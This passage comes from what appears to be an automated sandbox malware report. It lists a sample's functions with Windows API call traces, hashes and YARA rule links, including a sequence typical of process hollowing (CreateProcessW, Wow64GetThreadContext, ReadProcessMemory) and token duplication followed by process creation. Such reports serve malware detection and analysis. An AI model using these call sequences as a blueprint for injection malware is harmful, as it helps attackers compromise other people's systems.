                                                                        • Opcode Fuzzy Hash: 49a3294527d5b305cfbd6c685c74412098d504eb7a2552fd7b1e5b305baf6987
                                                                        • Instruction Fuzzy Hash: 7B2148B260825027D724EF3A9C82A6EF2D4AF85304F14893FF555C22C2F738D554879A
                                                                        Function 00414A46 Relevance: 3.0, APIs: 2, Instructions: 32COMMONLIBRARYCODE
                                                                        Download Yara Rule
                                                                        APIs
                                                                          • Part of subcall function 00417F77: __getptd_noexit.LIBCMT ref: 00417F77
                                                                        • __lock_file.LIBCMT ref: 00414A8D
                                                                          • Part of subcall function 00415471: __lock.LIBCMT ref: 00415496
                                                                        • __fclose_nolock.LIBCMT ref: 00414A98
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1594125296.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.1594110219.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594170507.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594188890.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594203550.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594218659.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594218659.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594252701.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_xBzBOQwywT.jbxd
                                                                        Similarity
                                                                        • API ID: __fclose_nolock__getptd_noexit__lock__lock_file
                                                                        • String ID:
                                                                        • API String ID: 2800547568-0
                                                                        • Opcode ID: a5ee4eb6f63f5c531cf15d6f0d52328148e0080a1a420ce895dcb566fcff73ac
                                                                        • Instruction ID: d9443fdd3ee0a3059f5d17ec53abbfe2105cc8a5d10ddad395bff0ae1f283336
                                                                        • Opcode Fuzzy Hash: a5ee4eb6f63f5c531cf15d6f0d52328148e0080a1a420ce895dcb566fcff73ac
                                                                        • Instruction Fuzzy Hash: EEF0F6308417019AD710AB7588027EF37A09F41379F22864FA061961D1C73C85C29B5D
                                                                        Function 00414FE2 Relevance: 3.0, APIs: 2, Instructions: 26COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • __lock_file.LIBCMT ref: 00415012
                                                                        • __ftell_nolock.LIBCMT ref: 0041501F
                                                                          • Part of subcall function 00417F77: __getptd_noexit.LIBCMT ref: 00417F77
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1594125296.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.1594110219.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594170507.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594188890.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594203550.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594218659.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594218659.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594252701.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_xBzBOQwywT.jbxd
                                                                        Similarity
                                                                        • API ID: __ftell_nolock__getptd_noexit__lock_file
                                                                        • String ID:
                                                                        • API String ID: 2999321469-0
                                                                        • Opcode ID: 5d7fd30e9bb4e6974f03027405c635b91b5e55acacb14f372dcacdb3af77c648
                                                                        • Instruction ID: e3e7bc223609ce985a1750c66bb322057640979a4505571362f253753ce4bf01
                                                                        • Opcode Fuzzy Hash: 5d7fd30e9bb4e6974f03027405c635b91b5e55acacb14f372dcacdb3af77c648
                                                                        • Instruction Fuzzy Hash: 64F03030900605EADB107FB5DD027EE3B70AF443A8F20825BB0259A0E1DB7C8AC29A59
                                                                        Function 03EBF70D Relevance: 1.9, APIs: 1, Instructions: 400processthreadCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • CreateProcessW.KERNELBASE(?,00000000), ref: 03EBFECB
                                                                        • Wow64GetThreadContext.KERNEL32(?,00010007), ref: 03EBFF61
                                                                        • ReadProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 03EBFF83
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1595095018.0000000003EBE000.00000040.00000020.00020000.00000000.sdmp, Offset: 03EBE000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_3ebe000_xBzBOQwywT.jbxd
                                                                        Similarity
                                                                        • API ID: Process$ContextCreateMemoryReadThreadWow64
                                                                        • String ID:
                                                                        • API String ID: 2438371351-0
                                                                        • Opcode ID: 6ff7500a3617197a005732162d507dd4d37460c8dcbf147a4ae2be43d63b6423
                                                                        • Instruction ID: 33a2a2837f98c9019b4080ce1f9fd38daae99267d4ca5a07f9d606ebb6867ee6
                                                                        • Opcode Fuzzy Hash: 6ff7500a3617197a005732162d507dd4d37460c8dcbf147a4ae2be43d63b6423
                                                                        • Instruction Fuzzy Hash: D412CF24A24658C6EB24DF64D8507DEB232EF68300F1061E9D10DEB7A5E77A4E81CF5A
                                                                        Function 00402F00 Relevance: 1.6, APIs: 1, Instructions: 104COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1594125296.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.1594110219.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594170507.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594188890.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594203550.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594218659.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594218659.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594252701.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_xBzBOQwywT.jbxd
                                                                        Similarity
                                                                        • API ID: _memmove
                                                                        • String ID:
                                                                        • API String ID: 4104443479-0
                                                                        • Opcode ID: 2ec043aaf64e314fdfe098a877e83977fff65afecd88cb3d034e09a745a7999d
                                                                        • Instruction ID: 6397ebbfaf442e519c955e074037b65107783079284990db5ef0c3dd021860ed
                                                                        • Opcode Fuzzy Hash: 2ec043aaf64e314fdfe098a877e83977fff65afecd88cb3d034e09a745a7999d
                                                                        • Instruction Fuzzy Hash: 36317371E00209EBDF009F52E9866AEFBF4FF40740F2189BED855E2650E7389990D759
                                                                        Function 00410CFC Relevance: 1.6, APIs: 1, Instructions: 94memoryCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1594125296.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.1594110219.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594170507.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594188890.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594203550.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594218659.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594218659.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594252701.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_xBzBOQwywT.jbxd
                                                                        Similarity
                                                                        • API ID: ProtectVirtual
                                                                        • String ID:
                                                                        • API String ID: 544645111-0
                                                                        • Opcode ID: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
                                                                        • Instruction ID: 21b87f0337b3904faf2e49e7d89a80b8c5538d611ad57d97d778efbd48141229
                                                                        • Opcode Fuzzy Hash: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
                                                                        • Instruction Fuzzy Hash: 8131F770A00105DBC718DF88E590AAAF7B1FB49310B6486A6E409CF355DB78EDC1CBD9
                                                                        Function 00408F40 Relevance: 1.6, APIs: 1, Instructions: 71COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1594125296.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.1594110219.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594170507.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594188890.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594203550.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594218659.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594218659.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594252701.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_xBzBOQwywT.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: e5559574dc10eca8e97d8025a500eef8ee7d185e3c773571fee143e03780f234
                                                                        • Instruction ID: 427b4a632c312742ac0951887501238d3178a51c37fde1d0fd35c98815df3d2a
                                                                        • Opcode Fuzzy Hash: e5559574dc10eca8e97d8025a500eef8ee7d185e3c773571fee143e03780f234
                                                                        • Instruction Fuzzy Hash: 21119674200201ABDB249F36D984E26B3A5AF45304B244D2FF9C5D7790DB7CE881DB5E
                                                                        Function 00414C76 Relevance: 1.5, APIs: 1, Instructions: 40COMMONLIBRARYCODE
                                                                        Download Yara Rule
                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1594125296.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.1594110219.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594170507.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594188890.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594203550.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594218659.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594218659.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594252701.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_xBzBOQwywT.jbxd
                                                                        Similarity
                                                                        • API ID: __lock_file
                                                                        • String ID:
                                                                        • API String ID: 3031932315-0
                                                                        • Opcode ID: 9d46abaf5bc0bef18357e8259ddf310e5220bee08d011669e2131a09b3543261
                                                                        • Instruction ID: 324047821ed349453e17c5e7f52af34d31ade4ebcb64e32b23ce3c6ad3b356a0
                                                                        • Opcode Fuzzy Hash: 9d46abaf5bc0bef18357e8259ddf310e5220bee08d011669e2131a09b3543261
                                                                        • Instruction Fuzzy Hash: FF011E71801219EBCF21AFA5C8028DF7B71AF44764F11851BF824551A1E7398AE2DBD9
                                                                        Function 00479714 Relevance: 1.5, APIs: 1, Instructions: 21COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                          • Part of subcall function 00479500: VariantInit.OLEAUT32(?), ref: 0047950F
                                                                          • Part of subcall function 00437063: VariantClear.OLEAUT32(00479459), ref: 0043706B
                                                                          • Part of subcall function 00437063: VariantCopy.OLEAUT32(00479459,00470E7C), ref: 00437076
                                                                        • VariantClear.OLEAUT32(?), ref: 0047973E
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1594125296.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.1594110219.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594170507.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594188890.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594203550.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594218659.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594218659.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594252701.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_xBzBOQwywT.jbxd
                                                                        Similarity
                                                                        • API ID: Variant$Clear$CopyInit
                                                                        • String ID:
                                                                        • API String ID: 24293632-0
                                                                        • Opcode ID: 5d7337fccf444792d50b64af1a389de1ebb3e8953e67bf22bf250c0f7ac223aa
                                                                        • Instruction ID: ce75823fad5ab463881ca656a32c684f825172ff923cb7d6b6c05433a05b9d1b
                                                                        • Opcode Fuzzy Hash: 5d7337fccf444792d50b64af1a389de1ebb3e8953e67bf22bf250c0f7ac223aa
                                                                        • Instruction Fuzzy Hash: C4E012B251010C6B8704FBFDDDC6CAFB7BCFB18204B80495DB919A3142EA75A914C7E9
                                                                        Function 004149C2 Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1594125296.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.1594110219.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594170507.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594188890.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594203550.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594218659.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594218659.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594252701.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_xBzBOQwywT.jbxd
                                                                        Similarity
                                                                        • API ID: __wfsopen
                                                                        • String ID:
                                                                        • API String ID: 197181222-0
                                                                        • Opcode ID: b5c1dd7f54315c70b952dff0fe33ec93e52da603c388fdf08d18a597afa050f6
                                                                        • Instruction ID: b34ddb7a850719c89311ce964fc9f65e9e9400c6a390d5c1cbb008c3125e494a
                                                                        • Opcode Fuzzy Hash: b5c1dd7f54315c70b952dff0fe33ec93e52da603c388fdf08d18a597afa050f6
                                                                        • Instruction Fuzzy Hash: 82C092B244020C77CF112A93EC02F9A3F1E9BC0764F058021FB1C1A162AA77EAA19689
                                                                        Function 03EC070C Relevance: 1.3, APIs: 1, Instructions: 21sleepCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • Sleep.KERNELBASE(000001F4), ref: 03EC0721
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1595095018.0000000003EBE000.00000040.00000020.00020000.00000000.sdmp, Offset: 03EBE000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_3ebe000_xBzBOQwywT.jbxd
                                                                        Similarity
                                                                        • API ID: Sleep
                                                                        • String ID:
                                                                        • API String ID: 3472027048-0
                                                                        • Opcode ID: 647f186050b41918f79179839cbc1a488579cc5f77474145a25b6e124dddc6ea
                                                                        • Instruction ID: a6e985a623d6d0a92be0d14de5c354839b4426cc6275f0afeeccf99b5794a27f
                                                                        • Opcode Fuzzy Hash: 647f186050b41918f79179839cbc1a488579cc5f77474145a25b6e124dddc6ea
                                                                        • Instruction Fuzzy Hash: 4EE0BF7498010DEFDB00EFA8D6496DE7BB4EF04301F1006A5FD05D7681DB309E64CA62
                                                                        Function 03EC0710 Relevance: 1.3, APIs: 1, Instructions: 18sleepCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • Sleep.KERNELBASE(000001F4), ref: 03EC0721
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1595095018.0000000003EBE000.00000040.00000020.00020000.00000000.sdmp, Offset: 03EBE000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_3ebe000_xBzBOQwywT.jbxd
                                                                        Similarity
                                                                        • API ID: Sleep
                                                                        • String ID:
                                                                        • API String ID: 3472027048-0
                                                                        • Opcode ID: 368835ae2f5fba710e6c01549c2017e46dd928bc4d187f44ede00cceab054826
                                                                        • Instruction ID: 6815d5a47b2b62e0015fb93a8f5cca84acd55d46073e908bb57010eaf2134101
                                                                        • Opcode Fuzzy Hash: 368835ae2f5fba710e6c01549c2017e46dd928bc4d187f44ede00cceab054826
                                                                        • Instruction Fuzzy Hash: 59E0E67498010DDFDB00EFB8D64969E7FB4EF04301F1002A5FD01D2281D6309D60CA62

                                                                        Non-executed Functions

                                                                        Function 0047C81C Relevance: 74.2, APIs: 40, Strings: 2, Instructions: 674windowkeyboardCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 0047C8E1
                                                                        • DefDlgProcW.USER32(?,0000004E,?,?), ref: 0047C8FC
                                                                        • GetKeyState.USER32(00000011), ref: 0047C92D
                                                                        • GetKeyState.USER32(00000009), ref: 0047C936
                                                                        • SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 0047C949
                                                                        • GetKeyState.USER32(00000010), ref: 0047C953
                                                                        • GetWindowLongW.USER32(00000002,000000F0), ref: 0047C967
                                                                        • SendMessageW.USER32(00000002,0000110A,00000009,00000000), ref: 0047C993
                                                                        • SendMessageW.USER32(00000002,0000113E,00000000,?), ref: 0047C9B6
                                                                        • _wcsncpy.LIBCMT ref: 0047CA29
                                                                        • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 0047CA5A
                                                                        • SendMessageW.USER32 ref: 0047CA7F
                                                                        • InvalidateRect.USER32(?,00000000,00000001), ref: 0047CADF
                                                                        • SendMessageW.USER32(?,00001030,?,0047EA68), ref: 0047CB84
                                                                        • ImageList_SetDragCursorImage.COMCTL32(00AB14B8,00000000,00000000,00000000), ref: 0047CB9B
                                                                        • ImageList_BeginDrag.COMCTL32(00AB14B8,00000000,000000F8,000000F0), ref: 0047CBAC
                                                                        • SetCapture.USER32(?), ref: 0047CBB6
                                                                        • ClientToScreen.USER32(?,?), ref: 0047CC17
                                                                        • ImageList_DragEnter.COMCTL32(00000000,?,?,?,?), ref: 0047CC26
                                                                        • ReleaseCapture.USER32 ref: 0047CC3A
                                                                        • GetCursorPos.USER32(?), ref: 0047CC72
                                                                        • ScreenToClient.USER32(?,?), ref: 0047CC80
                                                                        • SendMessageW.USER32(?,00001012,00000000,?), ref: 0047CCE6
                                                                        • SendMessageW.USER32 ref: 0047CD12
                                                                        • SendMessageW.USER32(?,00001111,00000000,?), ref: 0047CD53
                                                                        • SendMessageW.USER32 ref: 0047CD80
                                                                        • SendMessageW.USER32(?,0000110B,00000009,00000000), ref: 0047CD99
                                                                        • SendMessageW.USER32(?,0000110B,00000009,?), ref: 0047CDAA
                                                                        • GetCursorPos.USER32(?), ref: 0047CDC8
                                                                        • ScreenToClient.USER32(?,?), ref: 0047CDD6
                                                                        • GetParent.USER32(00000000), ref: 0047CDF7
                                                                        • SendMessageW.USER32(?,00001012,00000000,?), ref: 0047CE60
                                                                        • SendMessageW.USER32 ref: 0047CE93
                                                                        • ClientToScreen.USER32(?,?), ref: 0047CEEE
                                                                        • TrackPopupMenuEx.USER32(?,00000000,?,?,02F31B58,00000000,?,?,?,?), ref: 0047CF1C
                                                                        • SendMessageW.USER32(?,00001111,00000000,?), ref: 0047CF46
                                                                        • SendMessageW.USER32 ref: 0047CF6B
                                                                        • ClientToScreen.USER32(?,?), ref: 0047CFB5
                                                                        • TrackPopupMenuEx.USER32(?,00000080,?,?,02F31B58,00000000,?,?,?,?), ref: 0047CFE6
                                                                        • GetWindowLongW.USER32(?,000000F0), ref: 0047D086
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1594125296.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.1594110219.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594170507.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594188890.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594203550.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594218659.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594218659.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594252701.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_xBzBOQwywT.jbxd
                                                                        Similarity
                                                                        • API ID: MessageSend$ClientScreen$Image$CursorDragList_State$CaptureLongMenuPopupTrackWindow$BeginEnterInvalidateParentProcRectRelease_wcsncpy
                                                                        • String ID: @GUI_DRAGID$F
                                                                        • API String ID: 3100379633-4164748364
                                                                        • Opcode ID: 2b9e17ba3223fb7b4804536e302a42d427f78481ee09a8534aafb1e4469c1a6d
                                                                        • Instruction ID: 980357f173c9be8e312ccaa606797ee7157b6525bda81ee0817efdfc4c954517
                                                                        • Opcode Fuzzy Hash: 2b9e17ba3223fb7b4804536e302a42d427f78481ee09a8534aafb1e4469c1a6d
                                                                        • Instruction Fuzzy Hash: F842AD706043419FD714DF28C884FABB7A5FF89700F14865EFA489B291C7B8E846CB5A
                                                                        Function 00434418 Relevance: 43.9, APIs: 24, Strings: 1, Instructions: 133keyboardthreadwindowCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • GetForegroundWindow.USER32 ref: 00434420
                                                                        • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 00434446
                                                                        • IsIconic.USER32(?), ref: 0043444F
                                                                        • ShowWindow.USER32(?,00000009), ref: 0043445C
                                                                        • SetForegroundWindow.USER32(?), ref: 0043446A
                                                                        • GetWindowThreadProcessId.USER32(00000000,00000000), ref: 00434481
                                                                        • GetCurrentThreadId.KERNEL32 ref: 00434485
                                                                        • GetWindowThreadProcessId.USER32(00000000,00000000), ref: 00434493
                                                                        • AttachThreadInput.USER32(00000000,00000000,00000001), ref: 004344A2
                                                                        • AttachThreadInput.USER32(00000000,00000000,00000001), ref: 004344A8
                                                                        • AttachThreadInput.USER32(00000000,?,00000001), ref: 004344B1
                                                                        • SetForegroundWindow.USER32(00000000), ref: 004344B7
                                                                        • MapVirtualKeyW.USER32(00000012,00000000), ref: 004344C6
                                                                        • keybd_event.USER32(00000012,00000000), ref: 004344CF
                                                                        • MapVirtualKeyW.USER32(00000012,00000000), ref: 004344DD
                                                                        • keybd_event.USER32(00000012,00000000), ref: 004344E6
                                                                        • MapVirtualKeyW.USER32(00000012,00000000), ref: 004344F4
                                                                        • keybd_event.USER32(00000012,00000000), ref: 004344FD
                                                                        • MapVirtualKeyW.USER32(00000012,00000000), ref: 0043450B
                                                                        • keybd_event.USER32(00000012,00000000), ref: 00434514
                                                                        • SetForegroundWindow.USER32(00000000), ref: 0043451E
                                                                        • AttachThreadInput.USER32(00000000,?,00000000), ref: 0043453F
                                                                        • AttachThreadInput.USER32(00000000,00000000,00000000), ref: 00434545
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1594125296.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.1594110219.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594170507.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594188890.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594203550.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594218659.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594218659.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594252701.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_xBzBOQwywT.jbxd
                                                                        Similarity
                                                                        • API ID: ThreadWindow$AttachInput$ForegroundVirtualkeybd_event$Process$CurrentFindIconicShow
                                                                        • String ID: Shell_TrayWnd
                                                                        • API String ID: 2889586943-2988720461
                                                                        • Opcode ID: 8fb90041bee2e10260771149cd23f534c9f7767a381d567acbe6a88cba9e6a8e
                                                                        • Instruction ID: 0b42b206f44700a00bd4aa1610e9651ae8f7722fee000eb3c659fd44b6abead8
                                                                        • Opcode Fuzzy Hash: 8fb90041bee2e10260771149cd23f534c9f7767a381d567acbe6a88cba9e6a8e
                                                                        • Instruction Fuzzy Hash: AD416272640218BFE7205BA4DE4AFBE7B6CDB58B11F10442EFA01EA1D0D6F458419BA9
                                                                        Function 00446313 Relevance: 37.0, APIs: 17, Strings: 4, Instructions: 234processCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • DuplicateTokenEx.ADVAPI32(?,00000000,00000000,00000002,00000001,?), ref: 0044638E
                                                                        • CloseHandle.KERNEL32(?), ref: 004463A0
                                                                        • OpenWindowStationW.USER32(winsta0,00000000,00060000), ref: 004463B8
                                                                        • GetProcessWindowStation.USER32 ref: 004463D1
                                                                        • SetProcessWindowStation.USER32(00000000), ref: 004463DB
                                                                        • OpenDesktopW.USER32(default,00000000,00000000,00060081), ref: 004463F7
                                                                        • _wcslen.LIBCMT ref: 00446498
                                                                          • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                                                                        • _wcsncpy.LIBCMT ref: 004464C0
                                                                        • LoadUserProfileW.USERENV(?,00000020), ref: 004464D9
                                                                        • CreateEnvironmentBlock.USERENV(?,?,00000000), ref: 004464F3
                                                                        • CreateProcessAsUserW.ADVAPI32(?,00000000,00000000,00000000,00000000,?,?,?,?,000F01FF,00000400), ref: 00446522
                                                                        • UnloadUserProfile.USERENV(?,?), ref: 00446555
                                                                        • CloseWindowStation.USER32(00000000), ref: 0044656C
                                                                        • CloseDesktop.USER32(?), ref: 0044657A
                                                                        • SetProcessWindowStation.USER32(?), ref: 00446588
                                                                        • CloseHandle.KERNEL32(?), ref: 00446592
                                                                        • DestroyEnvironmentBlock.USERENV(?), ref: 004465A9
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1594125296.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.1594110219.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594170507.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594188890.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594203550.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594218659.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
